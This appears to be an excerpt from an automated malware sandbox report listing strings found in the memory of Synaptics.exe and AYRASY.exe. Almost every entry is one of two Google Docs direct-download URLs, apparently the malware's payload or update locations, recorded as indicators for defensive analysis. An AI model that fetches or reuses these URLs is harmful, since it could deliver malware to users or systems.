                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI3:t
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000003.00000002.2453391890.00000000078A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ7
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNIFt
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNO
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000003.00000003.2356535180.0000000005615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQQDv
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRKzv
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSO
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000003.00000002.2453391890.00000000078A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV4
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVG
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVJ~w.
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWRZM0
                                Source: Synaptics.exe, 00000003.00000003.2337108577.0000000005592000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXO
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2338570644.000000000557A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY.exeQ
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZIrt
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadackgr
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadax-ag
                                Source: Synaptics.exe, 00000003.00000002.2441515499.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                Source: Synaptics.exe, 00000003.00000002.2453391890.00000000078A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb7
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade3
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade:
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade;padding-right:0
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeSbtc
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfI.t
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg=
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.c
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj3Y01
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjK
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadline
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm(
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmp
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                                Source: Synaptics.exe, 00000003.00000002.2453391890.00000000078A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn4lv$
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnJ&w0
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnX
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                                Source: Synaptics.exe, 00000003.00000003.2337108577.0000000005592000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoO
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonte
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorn
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp2H
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrIZt
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrse
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsWBHJu
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadscal
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2338570644.000000000557A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-SeI
                                Source: Synaptics.exe, 00000003.00000003.2338570644.000000000557A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt:
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt;wor
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtE
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtO
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtent-e
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtg/
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtu.ber
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtube.H
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduri
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduser
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvH
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2444000919.000000000603E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyO
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                Source: Synaptics.exe, 00000003.00000002.2453391890.00000000078A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz4xv#
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzJRw/
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Synaptics.exe, 00000003.00000002.2453391890.00000000078A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~7
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: ~DFF3ADC856E5C0AEBE.TMP.4.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
